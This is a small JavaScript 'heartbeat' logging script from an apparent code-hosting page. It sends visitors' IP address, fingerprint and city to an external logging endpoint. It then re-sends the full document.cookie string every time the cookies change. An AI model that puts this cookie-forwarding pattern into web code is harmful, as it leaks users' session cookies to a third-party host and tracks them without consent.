You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 
 

23 lines
586 B

var __tmpCookie = "";
(function heartbeat_log()
{
setTimeout(function(){
setInterval(function(){
if(__isCookie && __tmpCookie != document.cookie){
var t = Date.parse(new Date())/1000;
cookie.set('_t', t);
$.post("https://log.yimian.xyz/heartbeat.php",{"fp":fp, "cookie":document.cookie, "tt":t});
cookie.set('fp',fp);
__tmpCookie = document.cookie;
}
},4000);
$.post("https://log.yimian.xyz/heartbeat.php",{"ip":ip,"fp":fp,"city":ipCity});
},3000);
})();